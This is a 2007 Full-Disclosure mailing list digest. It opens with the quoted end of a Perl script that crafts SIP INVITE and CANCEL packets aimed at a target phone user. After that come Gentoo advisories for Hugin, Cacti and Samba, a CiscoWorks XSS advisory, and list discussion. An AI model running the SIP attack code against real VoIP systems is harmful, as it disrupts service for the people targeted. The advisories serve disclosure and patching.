> > > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
> > >
> > > MESSAGE\r
> > >
> > > Content-Type: application/sdp\r
> > >
> > > Content-Length: $sdplen\r
> > >
> > > \r
> > >
> > > $sdp";
> > >
> > > $socket->send($msg);
> > >
> > > $text = '';
> > >
> > > while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){
> > >
> > > $socket->recv($text,1024,0);
> > >
> > > }
> > >
> > >
> > >
> > > $msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
> > >
> > > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
> > >
> > > From: <sip:$attackerUser\@$attackerIP>;tag=1\r
> > >
> > > To: <sip:$targetUser\@$targetIP>;tag=1\r
> > >
> > > Call-ID: $callid\@$attackerIP\r
> > >
> > > CSeq: $cseq CANCEL\r
> > >
> > > Max-Forwards: 70\r
> > >
> > > Content-Length: 0\r
> > >
> > > \r
> > >
> > > ";
> > >
> > > $socket->send($msg);
> > >
> > > time.sleep(1);
> > >
> > > $callid= $foo->randpattern("CCccnCn");
> > >
> > > $cseq = $foo->randregex('\d\d\d\d');
> > >
> > > $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
> > >
> > > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
> > >
> > > From: <sip:$attackerUser\@$attackerIP>;tag=2\r
> > >
> > > To: <sip:$targetUser\@$targetIP>\r
> > >
> > > Call-ID: $callid\@$attackerIP\r
> > >
> > > CSeq: $cseq INVITE\r
> > >
> > > Contact: <sip:$attackerUser\@$attackerIP>\r
> > >
> > > Max-Forwards: 70\r
> > >
> > > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
> > >
> > > MESSAGE\r
> > >
> > > Content-Type: application/sdp\r
> > >
> > > Content-Length: $sdplen\r
> > >
> > > \r
> > >
> > > $sdp";
> > >
> > > $socket->send($msg);
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > > No virus found in this outgoing message.
> > > Checked by AVG Free Edition.
> > > Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date:
> > > 04/12/2007 19:31
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://www.smashthestack.org
http://www.unprotectedhex.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071205/2172e592/attachment.html 

From py at gentoo.org  Wed Dec  5 22:22:22 2007
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Wed, 05 Dec 2007 23:22:22 +0100
Subject: [Full-disclosure] [ GLSA 200712-01 ] Hugin: Insecure temporary file
	creation
Message-ID: <4757249E.1060407@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200712-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Hugin: Insecure temporary file creation
      Date: December 05, 2007
      Bugs: #195996
        ID: 200712-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in Hugin, potentially allowing for
a Denial of Service.

Background
==========

Hugin is a GUI for creating and processing panoramic images.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /    Vulnerable    /                  Unaffected
    -------------------------------------------------------------------
  1  media-gfx/hugin     < 0.7_beta4-r1                   *>= 0.6.1-r1
                                                       >= 0.7_beta4-r1

Description
===========

Suse Linux reported that Hugin creates the
"hugin_debug_optim_results.txt" temporary file in an insecure manner.

Impact
======

A local attacker could exploit this vulnerability with a symlink
attack, potentially overwriting an arbitrary file with the privileges
of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Hugin users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-gfx/hugin-0.6.1-r1"

References
==========

  [ 1 ] CVE-2007-5200
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5200

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200712-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHVySeuhJ+ozIKI5gRApC1AJwINHhhWVulNCH81WAA82o0JHZAMACgkk3u
AV+OcdKR3iV+0OyoEHgyAUs=
=4jjs
-----END PGP SIGNATURE-----



From py at gentoo.org  Wed Dec  5 22:42:41 2007
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Wed, 05 Dec 2007 23:42:41 +0100
Subject: [Full-disclosure] [ GLSA 200712-02 ] Cacti: SQL injection
Message-ID: <47572961.6090803@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                        GLSA 200712-02:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Cacti: SQL injection
      Date: December 05, 2007
   Updated: December 05, 2007
      Bugs: #199509
        ID: 200712-02:02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An SQL injection vulnerability has been discovered in Cacti.

Background
==========

Cacti is a complete web-based frontend to rrdtool.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/cacti      < 0.8.7a                    *>= 0.8.6j-r7
                                                             >= 0.8.7a

Description
===========

It has been reported that the "local_graph_id" variable used in the
file graph.php is not properly sanitized before being processed in an
SQL statement.

Impact
======

A remote attacker could send a specially crafted request to the
vulnerable host, possibly resulting in the execution of arbitrary SQL
code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Cacti users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/cacti-0.8.6j-r7"

References
==========

  [ 1 ] CVE-2007-6035
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6035

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200712-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHVylguhJ+ozIKI5gRAnP7AJ49pQn5KjF96/1dEDG06qrysA40tQCffoPa
2ItH137QrWme8kLsvUHVDG8=
=e0gS
-----END PGP SIGNATURE-----



From Valdis.Kletnieks at vt.edu  Wed Dec  5 22:44:37 2007
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 05 Dec 2007 17:44:37 -0500
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: Your message of "Sun, 02 Dec 2007 20:04:42 EST."
	<e024ccca0712021704n790c47ffne534da86a6ba8e72@mail.gmail.com>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
	<16569.1196623374@turing-police.cc.vt.edu>
	<8a6b8e350712021134l72100737o143d1d7e5367f8e@mail.gmail.com>
	<20494.1196626985@turing-police.cc.vt.edu>
	<2d6724810712021232n74f452d1q45a90ea989375787@mail.gmail.com>
	<23107.1196629450@turing-police.cc.vt.edu>
	<e024ccca0712021704n790c47ffne534da86a6ba8e72@mail.gmail.com>
Message-ID: <31582.1196894677@turing-police.cc.vt.edu>

On Sun, 02 Dec 2007 20:04:42 EST, Dude VanWinkle said:

> Anyone who was a security expert 30 yrs ago should be ridiculed. Their
> job description was "I inspect all 5 & 1/4 disks that get mailed to
> us" and should be a reason NOT to hire them :-P

Anybody who doesn't know the history of security well enough to know what
was going on 30 years ago deserves to be ridiculed.

Here's a classic paper (the original Multics vulnerability analysis by Karger
and Schell):

http://www.acsac.org/2002/papers/classic-multics-orig.pdf

Here's their 30-years-later retrospective:

http://www.acsac.org/2002/papers/classic-multics.pdf

Executive summary: We've learned somewhere between diddly and squat from
30 years of experience. 

Incidentally, Karger&Schell is the "unnamed Air Force document" that Ken
Thompson references as the source for his Turing Award lecture:

Thompson, K., "Reflections on Trusting Trust", Communications of the ACM,
Vol. 27, No. 8, August 1984, http://www.acm.org/classics/sep95/ 

Ridicule these guys at your own peril.  You can count me out, my personal timer
is currently sitting at 29 years 10 months.. ;)

Incidentally, 30 years ago, the 5.25" disk was still well in the future - even
the 8" floppy was relatively new.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071205/ed0213f6/attachment.bin 

From worriedsecurity at googlemail.com  Wed Dec  5 21:51:00 2007
From: worriedsecurity at googlemail.com (worried security)
Date: Wed, 5 Dec 2007 21:51:00 +0000
Subject: [Full-disclosure] Report: Foreign Countries Develop U.S. Defense
	Systems Software
Message-ID: <67ea64530712051351g7da59e19hbf0422fab10eed77@mail.gmail.com>

America's reliance on security systems developed by foreign nations
could pose problems in the future.

Adversaries are developing key hardware and software for the United
States Department of Defense. The Defense Science Board Task Force
(dsbt) issued a September 2007 report warning, "The United States must
now confront?and plan for?the reality that adversaries may well be
supplying the key hardware and software on which the U.S. bases its
military and economic superiority." The primary fear is that
foreign-developed security software may come preprogrammed with
backdoors and malicious code that would allow hackers to steal
information or sabotage the system.

Because it is cheaper to do so, the U.S. has outsourced much of its
government software development, including Department of Security
software, to foreign nations?primarily India, China and Russia. While
the U.S. saves money in this arrangement, it is likely to pay in
national security.

http://www.thetrumpet.com/index.php?q=4524.2780.0.0



From Valdis.Kletnieks at vt.edu  Wed Dec  5 23:02:50 2007
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 05 Dec 2007 18:02:50 -0500
Subject: [Full-disclosure] Professional IT Security Service Providers -
	Exposed
In-Reply-To: Your message of "Tue, 04 Dec 2007 16:02:26 EST."
	<20071204210226.A0DFF22846@mailserver5.hushmail.com>
References: <20071204210226.A0DFF22846@mailserver5.hushmail.com>
Message-ID: <350.1196895770@turing-police.cc.vt.edu>

On Tue, 04 Dec 2007 16:02:26 EST, secreview at hushmail.com said:

> "Generally our reviews are done by reading the contents of the
> companies website. We strip away all the marketing fluff and we
> look for untruths, poor grammar, quality of service, team talent
> and capabilities, site clarity, etc. If the website leaves us with
> questions, or sounds too good to be true we call the security
> company being reviewed and engage them in conversation about their
> capabilities and offerings."
> 
> You'll notice that the above is an exact quote and not some altered 
> version of what was said taken out of context by someone ("trains") 
> trying to sound smart. 

So you take *their* contents and strip marketing fluff, but you don't like
it when somebody else does the same thing to your text?

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071205/68dc0957/attachment.bin 

From disclosure at liquidmatrix.org  Wed Dec  5 23:18:21 2007
From: disclosure at liquidmatrix.org (Liquidmatrix Security Digest)
Date: Wed, 5 Dec 2007 15:18:21 -0800 (PST)
Subject: [Full-disclosure] CiscoWorks Server XSS Vulnerability
Message-ID: <55617.24.36.194.217.1196896701.squirrel@webmail.liquidmatrix.org>

December 5th, 2007

=======
Summary
=======
Name: Cross Site Scripting in CiscoWorks
Release Date: 05 December 2007
Reference: LSD001-2007
Discover: Dave Lewis
Vendor: Cisco
Systems Affected: CiscoWorks version 2.6 (as tested)
All prior builds are affected

Risk: Medium
Status: Published
Reference:
http://www.liquidmatrix.org/blog/2007/12/05/advisory-cross-site-scripting-in-ciscoworks/

========
TimeLine
========
Discovered:  20 August 2007
Reported:  24 September 2007
Fixed: 5 November 2007
Patch Release: 5 December 2007
Published: 5 December 2007

===========
Description
===========
The initial CiscoWorks login page is susceptible to XSS attack.

Impact: attackers could execute XSS attacks that can harvest session
cookies and usernames/passwords.

=================
Technical Details
=================
The application allows users to perform certain actions via HTTP requests
without performing any validity checks to

verify the request. Input is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session.

===============
Fix Information
===============
This issue has now been resolved.

The patch may be obtained from:

http://www.cisco.com

Cisco Advisory
http://www.cisco.com/warp/public/707/cisco-sr-20071205-cw.shtml


===============================

Liquidmatrix Security Digest
http://www.liquidmatrix.org/blog/

2255B Queen Street East
suite 156
Toronto, Ontario
Canada
M4E 1G3



From py at gentoo.org  Wed Dec  5 23:22:55 2007
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Thu, 06 Dec 2007 00:22:55 +0100
Subject: [Full-disclosure] UPDATE: [ GLSA 200711-29 ] Samba: Execution of
	arbitrary code
Message-ID: <475732CF.9000906@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [UPDATE]               GLSA 200711-29:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Samba: Execution of arbitrary code
      Date: November 20, 2007
   Updated: December 05, 2007
      Bugs: #197519
        ID: 200711-29:02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Update
======

The original GLSA only resolved one of the two vulnerabilities due to a
regression. New packages are available that resolve both buffer
overflows.

The updated sections appear below.

Synopsis
========

Samba contains two buffer overflow vulnerabilities potentially
resulting in the execution of arbitrary code.

Affected packages
=================

    -------------------------------------------------------------------
     Package       /  Vulnerable  /                         Unaffected
    -------------------------------------------------------------------
  1  net-fs/samba      < 3.0.27a